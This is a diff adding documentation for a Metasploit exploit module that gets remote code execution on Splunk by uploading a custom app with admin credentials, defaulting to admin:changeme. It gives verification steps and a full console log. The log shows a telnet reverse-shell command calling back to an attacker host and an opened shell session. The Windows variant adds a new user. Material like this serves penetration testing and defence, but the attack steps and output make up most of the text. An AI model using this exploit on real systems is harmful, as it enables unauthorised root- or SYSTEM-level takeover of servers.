Add support for splunk 7.2.4 to 'Splunk Custom App Remote Code Execution

documentation/modules/exploit/multi/http/splunk_upload_app_exec.md

@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a feature of Splunk whereby a custom application can be
+uploaded through the web based interface. Through the \'script\' search command a
+user can call commands defined in their custom application which includes arbitrary
+perl or python code. To abuse this behavior, a valid Splunk user with the admin
+role is required. By default, this module uses the credential of "admin:changeme",
+the default Administrator credential for Splunk. Note that the Splunk web interface
+runs as SYSTEM on Windows, or as root on Linux by default. This module has been
+tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4.
+Version 7.2.4 has been tested successfully against OSX as well.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use exploit/multi/http/splunk_upload_app_exec```
+  3. Set required variables (you will need admin credentials)
+  4. Do: ```SET LHOST 192.168.1.2```
+  5. Do: ```SET RHOST 192.168.1.1```
+  6. Do: ```SET USERNAME admin```
+  7. Do: ```SET PASSWORD changeme```
+
+  8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected.
+     * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected.
+
+  9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target)
+
+## External Demo
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) <br>
+* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)<br>
+* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)<br>
+
+## Options
+
+  **EnableOverwrite**
+  Overwrites an app of the same name. Needed if you change the app code in the tgz.
+  Is not enabled by default.
+
+## Scenarios
+
+### Testing against 7.2.4 running on OSX
+
+  Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API.
+
+  ```
+msf5 exploit(multi/http/splunk_upload_app_exec) >
+msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1
+RHOST => 172.16.165.1
+msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk
+password => splunksplunk
+msf5 exploit(multi/http/splunk_upload_app_exec) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Automatic
+   1   Splunk >= 7.2.4 / Linux
+   2   Splunk >= 7.2.4 / Windows
+   3   Splunk >= 7.2.4 / OSX
+   4   Splunk >= 5.0.1 / Linux
+   5   Splunk >= 5.0.1 / Windows
+
+
+msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3
+target => 3
+msf5 exploit(multi/http/splunk_upload_app_exec) > exploit
+
+[*] Started reverse TCP double handler on 172.16.165.206:4444
+[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)'
+[*] Authenticating...
+[*] Fetching state token from /en-US/manager/appinstall/_upload
+[*] Uploading file upload_app_exec.tgz
+[+] upload_app_exec successfully uploaded
+[*] Invoking script command
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo 8kNbt70jYB3aJKPm;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100
+  ```